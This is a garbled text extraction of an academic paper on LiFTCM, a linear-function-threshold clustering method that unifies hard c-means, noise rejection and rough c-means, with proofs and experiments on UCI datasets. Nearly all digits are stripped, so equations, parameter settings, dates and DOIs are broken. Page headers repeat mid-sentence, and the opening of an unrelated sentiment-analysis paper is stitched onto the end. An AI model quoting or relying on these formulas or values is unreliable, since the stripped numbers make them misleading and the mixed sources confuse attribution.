a naive strategy is to choose c objects as initial cluster centers from u by simple random sampling without replacement. alternatively, there are strategies that set the initial cluster centers away from each other to reduce initial value dependencies and improve clustering performance, such as kkz (katsavounidis, kuo & zhang, ) and k-means++ (arthur & vassilvitskii, ). general noise rejection (gnr) since hcm is formulated based on the lms criterion, it is strongly affected by noise objects. like tcm, which introduces the lts criterion, the influence of noise objects can be reduced by rejecting objects distant from any cluster. in this type of gnr, each object is assigned to the nearest cluster under the condition that the distance dci is less than or equal to a threshold (noise distance) δ(δ> ): uci=   ( c =argmin ≤l≤c dli∧dci≤δ ) , (otherwise). ( ) the smaller δ is, the more objects are rejected as noise. the noise distance δ can depend on how many (what percentage of) objects to reject as noise. cluster-wise noise rejection (cnr) gnr is based on hcm-based exclusive assignment and cannot represent cluster overlap. by performing noise rejection independently for each cluster, possibilistic aspects that present non-belonging to any cluster and belonging to multiple clusters are achieved. in this type of cnr, noise rejection is performed for each cluster by rejecting objects over δc distant from its center: uci= { (dci≤δc), (otherwise). ( ) the smaller δc is, the more objects are rejected as noise for each cluster c. the cluster-wise noise distance δc can depend on how many (what percentage of) objects to reject as noise for each cluster. generalized rough c-means in rcm-type methods, which are rough set clustering schemes, membership in the lower, upper, and boundary areas of each cluster represents positive, possible, and uncertain ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure grcm: the linear function threshold t and the allowable range of dci (gray area). full-size doi: . /peerjcs. /fig- belonging to the cluster, respectively (lingras & west, ; peters, ; peters et al., ; ubukata, notsu & honda, ). grcm is constructed based on a heuristic scheme, not an objective function. in every iteration, the membership uci of object i to the upper area of cluster c is first calculated as follows: dmini = min ≤l≤c dli, ( ) uci= { (dci≤αd min i +β), (otherwise), ( ) where α (α≥ ) and β (β≥ ) are user-defined parameters that adjust the volume of the upper areas. grcm assigns each object to the upper area of not only its nearest cluster but also of other relatively nearby clusters using a linear function of the distance to its nearest cluster as a threshold. larger α and β imply larger clustering roughness and larger overlap of the upper areas of the clusters. figure shows the linear function threshold t and the allowable range of dci (gray area) in grcm. the membership uci and ûci of object i to the lower and boundary areas, respectively, is calculated using uci as follows: uci=   ( uci= ∧ c∑ l= uli= ) , (otherwise), ( ) ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. ûci=   ( uci= ∧ c∑ l= uli = ) , (otherwise) ( ) =uci−uci. ( ) grcm represents each cluster by the three regions. therefore, the new cluster center is determined by the aggregation of the centers of these regions. 
the cluster center bc is calculated by the convex combination of the centers of the lower, upper, and boundary areas of the cluster c: bc =   ∑n i= ucixi∑n i= uci ( n∑ i= uci= ∨ n∑ i= ûci= ) , w ∑n i= ucixi∑n i= uci +w ∑n i= ucixi∑n i= uci +ŵ ∑n i= ûcixi∑n i= ûci (otherwise), ( ) w,w,ŵ ≥ , ( ) w+w+ŵ = , ( ) where w, w, and ŵ are user-defined parameters that represent the impact of the centers of the lower, upper, and boundary areas, respectively. ubukata, notsu & honda ( ) suggest ŵ = because the centers of the boundary areas tend to cause instability in the calculations and poor classification performance. a unified approach for cluster-wise and general noise rejection approaches in this section, we show that gnr, cnr, and their combinations are realized by the linear function threshold in relaxed grcm. here, we consider relaxing the condition α≥ to α≥ in eq. ( ). hcm in hcm, each object is assigned to the cluster whose center is nearest to the object. this assignment can be interpreted as assigning object i to cluster c if dci is equal to (or less than) dmini , that is, uci= { (dci≤d min i ), (otherwise). ( ) this is the caseα= andβ= in the linear function thresholdαdmini +β for the assignment of upper area in grcm (eq. ( )). figure a shows the linear function threshold t and the allowable range of dci in hcm. the allowable range is limited to the case dci=dmini . we note that if there are multiple nearest cluster centers for an object, hcm requires certain tie- breaking rules for satisfying the sum-to-one constraints, such as exclusive assignment based on cluster priority and uniform assignment by distributing the membership, depending on the implementation. however, in the present linear function threshold-based assignment, an object has membership with respect to all its nearest clusters. the calculation of uci in hcm can be represented by that of uci in grcm. the lower and boundary areas are not used in hcm. thus, the cluster center calculation of hcm ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the linear function threshold t and the allowable range of dci (gray area): (a) hcm, (b) gnr, and (c) cnr. full-size doi: . /peerjcs. /fig- is consistent with that of grcm only using the upper areas, that is, w = in eq. ( ). therefore, grcm(α= ,β= ,w = ) represents hcm. gnr in gnr, a condition that the distance is less than δ is imposed in addition to the threshold- based hcm assignment (eq. ( )) to reject noise objects over δ distant from any clusters. for each object i to be assigned to the cluster c, dci must be equal to (or less than) dmini , and equal to or less than the noise distance δ, that is, uci= { (dci≤d min i ∧dci≤δ), (otherwise). ( ) this assignment can also be approximated using the linear function threshold by setting α= δ−ε δ and β=ε, where ε→+ , that is, uci=   ( dci≤ δ−ε δ dmini +ε ) , (otherwise). ( ) equation ( ) implies that uci = if dci ≤dmini and dci ≤δ. thus, eq. ( ) approaches the update rule eq. ( ). in order to show that eqs. ( ) and ( ) are equivalent, we show that the condition dci≤dmini ∧dci≤δ and the condition dci≤ δ−ε δ dmini +ε are equivalent, under the condition δ> and ε→+ . proposition if dci≤dmini ∧dci≤δ, then dci≤ δ−ε δ dmini +ε. proof. ( ) dci≤dmini ∧dci≤δ (assumption) ( ) dci≤dmini (conjunction elimination: ( )) ( ) dci≤δ (conjunction elimination: ( )) ( ) dmini ≤dci (definition: (eq. 
( ))) ( ) dmini ≤δ (transitivity: ( ), ( )) ( ) ε δ dmini + δ−ε δ dmini ≤ ε δ δ+ δ−ε δ dmini (multiply by ε δ and add δ−ε δ dmini in both sides of ( )) ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. ( ) dmini ≤ δ−ε δ dmini +ε (deformation: ( )) ( ) dci≤ δ−ε δ dmini +ε (transitivity: ( ), ( )) � proposition if dci≤ δ−ε δ dmini +ε, then dci≤d min i ∧dci≤δ, under the condition that ε is sufficiently small. proof. ( ) dci≤ δ−ε δ dmini +ε (assumption) ( ) dci≤dmini (from ( ) and ε→+ ) ( ) dmini ≤dci (definition: (eq. ( ))) ( ) dci≤ δ−ε δ dci+ε (from ( ), ( )) ( ) δdci≤δdci−εdci+δε (multiply by δ in both sides of ( )) ( ) dci≤δ (deformation: ( )) ( ) dci≤dmini ∧dci≤δ (conjunction introduction: ( ), ( )) � hence, (eq. ( )) induces (eq. ( )), and vice versa. figure b shows the linear function threshold t and the allowable range of dci (gray area) in gnr. since the intersection of the two lines y = δ−ε δ dmini +ε and y =d min i is (δ,δ), if dci >δ, object i is never assigned to cluster c. if dmini ≤δ, the threshold approaches the hcm-based nearest assignment. these characteristics are consistent with those of gnr. similar to hcm, in gnr, the cluster centers are calculated only using the upper areas. therefore, grcm(α= δ−ε δ ,β=ε,w = ) represents gnr. cnr the object-cluster assignment of cnr is determined only by the magnitude relation between dci and δc without considering dmini . we note that the case α= and β=δc in eq. ( ) corresponds to the update rule eq. ( ) of cnr. figure c shows the linear function threshold t and the allowable range of dci (gray area) in cnr. independent of dmini , if dci≤δ, object i is assigned to cluster c. similar to hcm and gnr, in cnr, the cluster centers are calculated only using the upper areas. therefore, grcm(α= ,β=δc,w = ) represents cnr. smooth transition between gnr and cnr by tuning linear function threshold in reference to the threshold-based assignment of gnr, i.e., eq. ( ), we construct the following rule using a parameter t ∈[ ,δc]: uci=   (dci≤ δc−t δc dmini +t), (otherwise). ( ) if t = , then eq. ( ) reduces to eq. ( ) of hcm. if t =ε, where ε→+ , then eq. ( ) changes to eq. ( ) of gnr. if t =δc, then eq. ( ) reduces to eq. ( ) of cnr. if t ∈( ,δc), then eq. ( ) represents the combinations of gnr and cnr. thereby, smooth transition between hcm, gnr, and cnr is realized. ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure combination of gnr and cnr: the linear function threshold t and the allowable range of dci (gray area). full-size doi: . /peerjcs. /fig- figure shows the linear function threshold t and the allowable range of dci (gray area) in the combinations of gnr and cnr. it can be seen that this linear function can transition between the states shown in fig. by t. for practical use, we consider the normalized parameter z ∈[ , ]. we let z = t δc ∈[ , ] and replace t in eq. ( ) with zδc: uci= { (dci≤( −z)d min i +zδc), (otherwise). ( ) then, z = represents hcm, z →+ represents gnr, z ∈ ( , ) represents the combinations of gnr and cnr, and z = represents cnr. by eq. ( ), the threshold value is represented by the convex combination of dmini and δc. that is, hcm, gnr, and cnr can be characterized depending on which of dmini and δc is emphasized as the threshold value. proposed method in this study, we propose liftcm as one of the relaxed grcm. 
‘‘lift’’ is an acronym that stands for ‘‘linear function threshold’’ and suggests that the threshold is lifted by the linear function. a sample procedure of liftcm is described in algorithm . although this algorithm just corresponds to the case where the condition α≥ in grcm is relaxed to α≥ , liftcm can represent gnr, cnr, and their combinations in addition to grcm. if ≤α≤ , liftcm includes hcm, gnr, cnr, and their ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. algorithm liftcm step . determine α (α≥ ), β (β≥ ), and w,w,ŵ ≥ such that w+w+ŵ = . step . initialize bc. step . calculate uci using eqs. ( ) and ( ). step . calculate uci and ûci using eqs. ( ) and ( ). step . calculate bc using eq. ( ). step . repeat steps - until uci do not change. table relationship between hcm, gnr, cnr, and rough clustering, and their combinations in terms of the linear function threshold in liftcm. linear function threshold: αdmini +β β= β→+ <β α= – – cnr <α< – gnr combinations of gnr and cnr α= hcm hcm lrcm <α prcm prcm combinations of lrcm and prcm (grcm) combinations. if α≥ , liftcm includes hcm, lrcm, prcm, and their combinations. table summarizes the relationships between hcm, gnr, cnr, and rough clustering, and their combinations depending on the values of the parameters α and β in liftcm. as it is difficult to adjust noise sensitivity by directly changing α and β when noise rejection is considered in liftcm, it is convenient to fix the cluster-wise noise distance δc and adjust the combination of hcm, gnr, and cnr by the parameter z ∈[ , ] with α=( −z) and β=zδc. the representations of the conventional methods by setting the parameters of liftcm are summarized as follows: . hcm: liftcm(α= , β= , w = ). . lrcm: liftcm(α= , β≥ , w = ). . prcm: liftcm(α≥ , β= , ŵ = ). . grcm: liftcm(α≥ , β≥ ). . gnr: liftcm(α= −z, β=zδc, z →+ , w = ). . cnr: liftcm(α= , β=δc, w = ). . combinations of gnr and cnr: liftcm(α= −z, β=zδc, z ∈[ , ], w = ). visualization of classification boundaries in this section, we visualize the classification boundaries of the proposed liftcm. liftcm was applied to a grid point dataset, in which n= × objects are uniformly arranged in the unit square [ , ]×[ , ]. c = clusters (c = , , ), which correspond to the primary colors (red,green,blue), respectively, are extracted by liftcm. the rgb-color of object i is determined by (r,g,b)i=( ×u i, ×u i, ×u i). objects belonging to a single cluster are represented by primary colors, objects belonging to multiple clusters are represented by additive colors, and objects not belonging to any cluster are represented ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure classification boundaries of liftcm(α≥ , β≥ , w = ) representing lrcm, prcm, and grcm assignments: (a) liftcm(α= , β= . , w = ) (lrcm assignment), (b) liftcm(α= . , β= , w = ) (prcm assignment), and (c) liftcm(α= . , β= . , w = ) (grcm assignment). full-size doi: . /peerjcs. /fig- by black color. the cluster centers are indicated by cross marks. initial cluster centers were determined by b =( , )>, b =( . , )>, and b =( , )>. figure shows the results of liftcm(α≥ , β ≥ , w = ), which corresponds to grcm(w = ). figure a shows the result of liftcm(α= , β= . , w = ), which is interpreted as the lrcm assignment. figure b shows the result of liftcm(α= . , β= , w = ), which is interpreted as the prcm assignment. figure c shows the result of liftcm(α= . 
, β= . , w = ), which is interpreted as the grcm assignment. thereby, cluster overlap is realized by lifting the threshold by a linear function. figure shows the results of liftcm(α= −z, β=zδc, z ∈[ , ], w = ) in which noise rejection is intended. the noise distance was set to δc = . and the parameter z was set to { , . , . , . , . , }. figure a shows the result for z = . a hard partition with a voronoi boundary is generated in the same manner as in hcm. figure b shows the result for z = . . such a small value of z realize general noise rejection, that is, objects over δc distant from any cluster are rejected. the boundary between clusters is the voronoi boundary, and objects whose distance to any cluster is greater than the noise distance δc are shown in black and rejected as noise. as z approaches in the order of figs. c– e, the overlap between clusters increases. figure f shows the result for z = . in this case, cluster-wise noise rejection is performed and each cluster is composed of a circle with radius δc centered at the cluster center. by adjusting the threshold relative to δc, cluster overlap and noise rejection are realized simultaneously. thereby, liftcm can realize hcm, grcm, gnr, cnr, and their combinations by lifting the threshold by a linear function. schematic diagram figure is a schematic diagram of the proposal of this study. representations of hcm, lrcm, prcm, grcm, gnr, cnr, and their combinations by the linear function threshold in liftcm with the parameters (α, β), and their relationships are shown. (α,β)=( , ) is the default state and represents hcm assignment. increasing α from and β from increases cluster overlap. simultaneously increasing α and β increases clustering ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure classification boundaries of liftcm(α= − z, β = zδc, w = ) representing hcm, gnr, cnr, and their combinations: (a) z = (hcm), (b) z = . (gnr), (c) z = . (combination), (d) z = . (combination), (e) z = . (combination), and (f) z = (cnr). full-size doi: . /peerjcs. /fig- roughness. this shows combinations of lrcm and prcm, namely, grcm. liftcm gives an interpretation in ≤α≤ in addition to grcm. as proposed in the smooth transition, when the parameter z is increased from to , (α,β) transits from ( , ) to ( ,δc), namely, from hcm to cnr via gnr. the parameter z has the effect of changing clustering more possibilistic. cluster overlap in cnr is attributed to the increase in β in lrcm. the direction in which the destination δc is lowered is the direction in which noise objects are more rejected. numerical experiments this section presents the results of numerical experiments for evaluating the clustering performance of the proposed liftcm with various parameter settings in four real-world datasets downloaded from uci machine learning repository (https://archive.ics.uci.edu/ ml/) and summarized in table . performance was evaluated by the accuracy of class center estimation. the datasets are labeled and include the feature vector and the correct class label of each object. each dataset was partitioned into disjoint classes according to the class labels, and the center of each class (class center) was calculated. liftcm was applied to the generated unlabeled datasets. the number c of clusters was set to the number of classes. to avoid initial value dependence, the initial cluster centers were set to the cluster centers generated by kkz-based hcm. 
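To make the assignment rule that these experiments exercise concrete, the following sketch is an illustrative implementation written for this excerpt, not the authors' code: the Euclidean distance, the variable names, and the simplified centre update are assumptions (the full GRCM-style update additionally weights the lower and boundary areas, which is omitted here). It shows the linear-function-threshold assignment and the parameterisation α = 1 − z, β = z·δc discussed above.

```python
# Illustrative sketch of the LiFTCM upper-area assignment (not the authors' code).
# Assumptions: Euclidean distances; a simplified centre update that averages the
# objects assigned to each cluster's upper area (the paper's full update also
# weights lower/boundary areas, which is omitted here).
import numpy as np

def liftcm_assign(X, centers, alpha, beta):
    """Object i belongs to cluster c iff
    d(x_i, b_c) <= alpha * min_l d(x_i, b_l) + beta  (the 'lifted' threshold)."""
    dist = np.linalg.norm(X[:, None, :] - centers[None, :, :], axis=2)  # shape (n, C)
    threshold = alpha * dist.min(axis=1, keepdims=True) + beta          # shape (n, 1)
    return dist <= threshold                                            # boolean (n, C)

def liftcm(X, centers, alpha, beta, n_iter=100):
    for _ in range(n_iter):
        U = liftcm_assign(X, centers, alpha, beta)
        new_centers = centers.copy()
        for c in range(centers.shape[0]):
            if U[:, c].any():                      # keep the old centre if the cluster is empty
                new_centers[c] = X[U[:, c]].mean(axis=0)
        if np.allclose(new_centers, centers):
            break
        centers = new_centers
    return centers, liftcm_assign(X, centers, alpha, beta)

def z_parameterisation(z, noise_dist):
    """Smooth transition: alpha = 1 - z, beta = z * noise_dist."""
    return 1.0 - z, z * noise_dist
```

Setting z = 0 reproduces a hard Voronoi partition; for small z an object whose nearest centre is farther than the noise distance satisfies the test for no cluster (an all-False row of the membership matrix) and is rejected, i.e., general noise rejection; z = 1 yields per-cluster balls of radius δc, i.e., cluster-wise noise rejection, matching the behaviour described above.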
considering the correspondence of the clusters and the ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://archive.ics.uci.edu/ml/ https://archive.ics.uci.edu/ml/ http://dx.doi.org/ . /peerj-cs. figure schematic diagram: representations of hcm, lrcm, prcm, grcm, gnr, cnr, and their combinations by a linear function threshold in liftcm with the parameters (α, β), and their relation- ships. full-size doi: . /peerjcs. /fig- classes, the minimum total error of the cluster centers and the class centers, which is called center-error, was taken as the measurement value. let b̂c be the class center of the class corresponding to cluster c. center-error is calculated by center_error = c∑ c= ||bc−b̂c||. ( ) if the center-error is small, the accuracy of class center estimation is high, and clustering performance is assumed to be high. figure shows the center-error measurements as α and β take equally distributed values using contour lines. colors closer to purple imply smaller center-error and hence better clustering performance. figure a shows the results for the iris dataset. performance is improved at approximately α= and β= . , and when α is increased, performance is maintained by decreasing β. this implies that moderate roughness improves performance. figure b shows the results for the wine dataset. performance is improved at approximately α= . and β = . when α and β exceed certain values, performance deteriorates rapidly. this implies that moderate roughness is acceptable, but excessive roughness degrades performance. figure c shows the results for the glass dataset. performance is improved at approximately α= . and β= . . as with the iris dataset, performance is improved with moderate roughness. figure d shows the results for the breast cancer wisconsin dataset. performance is improved at approximately α= and β= , and it is clear that performance is improved with moderate roughness, as is the case with the iris and the glass datasets. therefore, it is suggested that performance is improved when α and ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table characteristics of the datasets and the range of parameters α, β, δc, and z, which tune the lin- ear function threshold in liftcm. dataset #classes #features #objects (#objects in classes) settings of parameters iris ( , , ) α ∈ [ , . ], β ∈ [ , . ], δc ∈[ . , . ], z ∈[ , ] wine ( , , ) α ∈ [ , . ], β ∈ [ , ], δc ∈[ , ], z ∈[ , ] glass ( , , , , , ) α∈[ , . ], β∈[ , . ], δc ∈[ , ], z ∈[ , ] breast cancer wisconsin ( , ) α∈[ , . ], β ∈[ , ], δc ∈[ , ], z ∈[ , ] β are increased to obtain moderate roughness. thus, the representation of combinations of lrcm and prcm by liftcm performs well. figure shows the center-error measurements as δc and z take equally distributed values using contour lines. figure a shows the results for the iris dataset. performance is improved at approximately δc = . and z = . , or at approximately δc = . and z = . . this implies that setting an appropriate noise distance and combinations of noise and possibilistic clustering yield satisfactory results. figure b shows the results for the wine dataset. performance is improved at approximately δc = and z = . . when δc is increased, performance is maintained by decreasing z. this implies that general noise rejection performs better than cluster-wise noise rejection when the noise distance is large. 
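For reference, the centre-error underlying these per-dataset comparisons, i.e., the minimum total distance between cluster centres and class centres over all cluster-to-class correspondences, can be computed as in the sketch below. This is an assumed implementation written for small numbers of clusters; a Hungarian-algorithm matching would scale better.

```python
# Sketch of the centre-error measure (assumed implementation, small C only):
# the minimum, over all cluster-to-class correspondences, of the summed distances
# between each cluster centre and its matched class centre.
from itertools import permutations
import numpy as np

def center_error(cluster_centers, class_centers):
    C = len(cluster_centers)
    best = np.inf
    for perm in permutations(range(C)):          # try every correspondence
        total = sum(np.linalg.norm(cluster_centers[c] - class_centers[perm[c]])
                    for c in range(C))
        best = min(best, total)
    return best
```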
figure c shows the results for the glass dataset. performance is improved at approximately δc = and z = . . among combinations, those closer to general noise rejection perform well. figure d shows the results for the breast cancer wisconsin dataset. performance is improved at approximately δc = and z = . . as with the other datasets, combinations perform well. as in the case of the wine dataset, states close to general noise rejection perform well when δc is large. therefore, the representation of combinations of gnr and cnr by liftcm is satisfactory. when the noise distance is large, states close to gnr tend to yield satisfactory results. discussion cluster center calculation utilizing probabilistic memberships rcm-type methods have the problem that even if the number of objects in the boundary area is small, they have unnaturally large impacts on the new cluster center compared to the objects in the lower area, because the cluster center is calculated by the convex combination of these areas. to cope with the problem, peters proposed πprcm by introducing the ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure minimum total errors between cluster centers and class centers by liftcm(α≥ , β≥ , w = ) representing grcm(w = ): (a) iris, (b) wine, (c) glass, and (d) breast cancer wisconsin. full-size doi: . /peerjcs. /fig- cluster center calculation based on the normalized membership of the membership to the upper area, which satisfies the probabilistic constraint (peters, ; peters, ). ‘‘π’’ is an acronym that stands for ‘‘principle of indifference,’’ in which the probability is assigned equally by dividing the number of possible clusters. ubukata et al. proposed πgrcm (ubukata et al., ) based on grcm. the proposed liftcm has almost the same formulation as grcm except that the condition α≥ is relaxed to α≥ . thus, πliftcm can be formulated in a similar manner to πgrcm by introducing the following normalized membership ũci of the membership to the upper area and the cluster center calculation based on ũci: ũci= uci∑c l= uli , ( ) bc = ∑n i= ũcixi∑n i= ũci . ( ) here, attention should be paid to the following cases. in the case of α < , that is, in the case of gnr and cnr, since non-belonging of the object to any cluster is handled and ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure minimum total errors between cluster centers and class centers by liftcm(α= − z, β = zδc, z ∈ [ , ], w = ) representing hcm, gnr, cnr, and their combinations: (a) iris, (b) wine, (c) glass, and (d) breast cancer wisconsin. full-size doi: . /peerjcs. /fig- thus the denominator ∑c l= uli can become zero, it is necessary to set ũci= for all clusters in such cases. conclusions in this study, as a unified approach for general noise rejection (gnr) and cluster-wise noise rejection (cnr) in hard c-means (hcm), we proposed linear function threshold- based c-means (liftcm) by relaxing generalized rough c-means (grcm) clustering. we showed that the linear function threshold-based assignment in liftcm can represent gnr, cnr, and their combinations as well as grcm. by the visualization of the classification boundaries, transitions among conventional methods based on liftcm and their characteristics were clarified. in the numerical experiments, the clustering performance by liftcm with various parameter settings was evaluated. 
it was demonstrated that combinations of lrcm and prcm, or combinations of gnr and cnr by liftcm performed well. ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. we plan to investigate the relationship between the proposed method and fuzzy clustering with noise rejection. automatic determination of parameters will also be considered. additional information and declarations funding this work was supported by jsps kakenhi grant numbers jp k , and the program to disseminate tenure tracking system, mext, japan. there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the author: jsps kakenhi: jp k . program to disseminate tenure tracking system, mext, japan. competing interests the authors declare there are no competing interests. author contributions • seiki ubukata conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the raw datasets are available in the supplementary file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references arthur d, vassilvitskii s. . k-means++: the advantages of careful seeding. in: proceedings of the eighteenth annual acm-siam symposium on discrete algorithms. society for industrial and applied mathematics, – . bezdek jc. . pattern recognition with fuzzy objective function algorithms. new york: plenum press. cuesta-albertos ja, gordaliza a, matrán c. . trimmed k-means: an attempt to ro- bustify quantizers. the annals of statistics ( ): – doi . /aos/ . davé rn. . characterization and detection of noise in clustering. pattern recognition letters ( ): – doi . / - ( ) - . ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /aos/ http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /peerj-cs. davé rn, krishnapuram r. . robust clustering methods: a unified view. ieee transactions on fuzzy systems ( ): – doi . / . . denœux t, kanjanatarakul o. . evidential clustering: a review. in: international symposium on integrated uncertainty in knowledge modelling and decision making. cham: springer, – . denœux t, masson m. . clustering of proximity data using belief functions. in: intelligent systems for information processing. amsterdam: elsevier, – . denœux t, masson m-h. . evclus: evidential clustering of proximity data. ieee transactions on systems, man, and cybernetics, part b (cybernetics) ( ): – doi . /tsmcb. . . dubes rc, jain ak. . algorithms for clustering data. new jersey: prentice hall englewood cliffs. dunn jc. . a fuzzy relative of the isodata process and its use in detecting compact well-separated clusters. journal of cybernetics ( ): – doi . / . edgeworth fy. . on observations relating to several quantities. hermathena ( ): – . garcía-escudero lÁ, gordaliza a. . 
robustness properties of k means and trimmed k means. journal of the american statistical association ( ): – doi . / . . . gauss cf. . theoria motus corporum coelestium in sectionibus conicis solem ambientium. hamburg: friedrich perthes und i. h. besser. hampel fr. . beyond location parameters: robust concepts and methods. bulletin of the international statistical institute ( ): – . huber pj. . robust estimation of a location parameter. the annals of mathematical statistics ( ): – . huber pj. . robust statistics. new york: john wiley & sons. katsavounidis i, kuo c-cj, zhang z. . a new initialization technique for generalized lloyd iteration. ieee signal processing letters ( ): – doi . / . . kaufmann l, rousseeuw pj. . clustering by means of medoids. in: dodge y, ed. statistical data analysis based on the l —norm and related methods. amsterdam: elsevier, – . krishnapuram r, keller jm. . a possibilistic approach to clustering. ieee transac- tions on fuzzy systems ( ): – doi . / . . krishnapuram r, keller jm. . the possibilistic c-means algorithm: insights and recommendations. ieee transactions on fuzzy systems ( ): – doi . / . . legendre a-m. . nouvelles méthodes pour la détermination des orbites des cométes. paris: f. didot. lingras p, west c. . interval set clustering of web users with rough k-means. journal of intelligent information systems ( ): – doi . /b:jiis. . . a. ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /tsmcb. . http://dx.doi.org/ . / http://dx.doi.org/ . / . . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /b:jiis. . . a http://dx.doi.org/ . /peerj-cs. macqueen j. . some methods for classification and analysis of multivariate obser- vations. in: proceedings of the fifth berkeley symposium on mathematical statistics and probability, vol. . oakland, – . maji p, pal sk. a. rfcm: a hybrid clustering algorithm using rough and fuzzy sets. fundamenta informaticae ( ): – . maji p, pal sk. b. rough set based generalized fuzzy c-means algorithm and quantitative indices. ieee transactions on systems, man, and cybernetics, part b (cybernetics) ( ): – doi . /tsmcb. . . masson m-h, denœux t. . ecm: an evidential version of the fuzzy c-means algorithm. pattern recognition ( ): – doi . /j.patcog. . . . pal nr, pal k, bezdek jc. . a mixed c-means clustering model. in: proceedings of th international fuzzy systems conference, vol. . ieee, – . pal nr, pal k, keller j. m, bezdek jc. . a possibilistic fuzzy c-means clustering algorithm. ieee transactions on fuzzy systems ( ): – doi . /tfuzz. . . pawlak z. . rough sets. international journal of computer & information sciences ( ): – doi . /bf . pawlak z. . rough sets: theoretical aspects of reasoning about data. vol. . dordrecht: kluwer academic publishers. peters g. . some refinements of rough k-means clustering. pattern recognition ( ): – doi . /j.patcog. . . . peters g. . rough clustering utilizing the principle of indifference. information sciences : – doi . /j.ins. . . . peters g. . is there any need for rough clustering? pattern recognition letters : – doi . /j.patrec. . . . peters g, crespo f, lingras p, weber r. . soft clustering–fuzzy and rough ap- proaches and their extensions and derivatives. international journal of approximate reasoning ( ): – doi . /j.ijar. . . . rousseeuw pj. . least median of squares regression. journal of the american statistical association ( ): – doi . / . . . rousseeuw pj, leroy a. . 
robust regression and outlier detection. new york: john wiley & sons, inc. ubukata s, kato h, notsu a, honda k. . rough set-based clustering utilizing probabilistic memberships. journal of advanced computational intelligence and intelligent informatics ( ): – doi . /jaciii. .p . ubukata s, notsu a, honda k. . general formulation of rough c-means clustering. international journal of computer science and network security ( ): – . ubukata ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tsmcb. . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /tfuzz. . http://dx.doi.org/ . /bf http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /j.ijar. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /jaciii. .p http://dx.doi.org/ . /peerj-cs. edinburgh research explorer multiple instance learning networks for fine-grained sentiment analysis citation for published version: angelidis, s & lapata, m , 'multiple instance learning networks for fine-grained sentiment analysis', transactions of the association for computational linguistics, vol. , pp. - . <https://transacl.org/ojs/index.php/tacl/article/view/ > link: link to publication record in edinburgh research explorer document version: publisher's pdf, also known as version of record published in: transactions of the association for computational linguistics general rights copyright for the publications made accessible via the edinburgh research explorer is retained by the author(s) and / or other copyright owners and it is a condition of accessing these publications that users recognise and abide by the legal requirements associated with these rights. take down policy the university of edinburgh has made every reasonable effort to ensure that edinburgh research explorer content complies with uk legislation. if you believe that the public display of this file breaches copyright please contact openaccess@ed.ac.uk providing details, and we will remove access to the work immediately and investigate your claim. download date: . apr. https://transacl.org/ojs/index.php/tacl/article/view/ https://www.research.ed.ac.uk/portal/en/publications/multiple-instance-learning-networks-for-finegrained-sentiment-analysis( b - eb - c - cad- fbc c d).html multiple instance learning networks for fine-grained sentiment analysis stefanos angelidis and mirella lapata institute for language, cognition and computation school of informatics, university of edinburgh crichton street, edinburgh eh ab s.angelidis@ed.ac.uk, mlap@inf.ed.ac.uk abstract we consider the task of fine-grained senti- ment analysis from the perspective of multi- ple instance learning (mil). our neural model is trained on document sentiment labels, and learns to predict the sentiment of text seg- ments, i.e. sentences or elementary discourse units (edus), without segment-level supervi- sion. we introduce an attention-based polar- ity scoring method for identifying positive and negative text snippets and a new dataset which we call spot (as shorthand for segment-level polarity annotations) for evaluating mil- style sentiment models like ours. experimen- tal results demonstrate superior performance against multiple baselines, whereas a judge- ment elicitation study shows that edu-level opinion extraction produces more informative summaries than sentence-based alternatives. 
